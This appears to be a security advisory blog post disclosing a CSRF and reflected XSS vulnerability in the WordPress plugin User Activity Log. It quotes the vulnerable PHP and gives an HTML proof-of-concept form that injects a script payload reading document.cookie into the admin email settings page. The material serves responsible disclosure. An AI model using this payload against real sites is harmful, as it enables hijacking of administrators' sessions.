29 Jul

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in User Activity Log

Every additional plugin that you add to your WordPress website adds additional security risk, that includes security plugins. Recently we did a quick check over plugins designed to allow you to keep track actions taken by users on your website. In several of cases we found rather minor security vulnerabilities. Like the first issue we found in the plugin User Activity Log, this one involves a lack of protection against cross-site request forgery (CSRF).

This vulnerability involves a lack of protection against CSRF when saving the plugin’s settings. That is due to a lack on a nonce.

This can be combined with cross-site scripting (XSS) on the Email settings page. While the values are all eventually validated or sanitized, the POST inputs “sol-mail-to” and “sol-mail-from” are stored in variables $to_email and $from_email respectively ahead of them being validated in the file /user_settings_menu.php:

460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
$to_email = $_POST['sol-mail-to'];
$from_email = $_POST['sol-mail-from'];
$mail_msg = ual_test_input($_POST['sol-mail-msg']);
$emailEnable = $_POST['emailEnable'];
update_option('enable_email', $emailEnable);
if (isset($_POST['emailEnable'])) {
	if ($_POST['emailEnable'] == '1') {
		if ($mail_msg == "") {
			$msg = __("Please enter message", 'wp_user_log');
		}
		if ($to_email == "" || $from_email == "") {
			$msg = __("Please enter the email address", 'wp_user_log');
		}
		if (!filter_var($to_email, FILTER_VALIDATE_EMAIL) || !filter_var($from_email, FILTER_VALIDATE_EMAIL) || !is_email($to_email) || !is_email($from_email)) {
			$msg = __("Please enter valid email address", 'wp_user_log');
		} else {
			update_option('to_email', $to_email);
			update_option('from_email', $from_email);
			update_option('email_message', $mail_msg);
		}
	}
}

Placing malicious JavaScript code in those inputs will cause there values to not be saved permanently, but the values are later echoed out on the page at

530
<input name="sol-mail-from" type="email" value="<?php echo $from_email; >" />

and

537
<input name="sol-mail-to" type="email" value="<?php echo $to_email; >" />

Since the cross-site scripting (XSS) is reflected and not persistent, in major web browsers other than Firefox it would be hard to exploit this since you would need to get around the XSS filtering they include to protect against this type of exploit.

We received a response from the developer the same day we contacted this issue and the other we discovered, but a month later the plugin has yet to receive an update, so the vulnerabilities still exist in the current version, 1.2.3.

Proof of Concept

The following proof of concept will cause any available cookies to shown in alert box when logged in to WordPress as an Administrator. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=email_settings_menu"" method="POST">
<input type="hidden" name="emailEnable" value="1" />
<input type="hidden" name="sol-mail-from" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="btnsolEmail" value="Save Changes" />
</form>
</body>
</html>

Timeline

  • 6/29/2016 – Developer notified.
  • 6/29/2016 – Developer responds.
  • 10/11/2016 – Version 1.2.6 released, which fixes issue.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.

Leave a Reply

Your email address will not be published. Required fields are marked *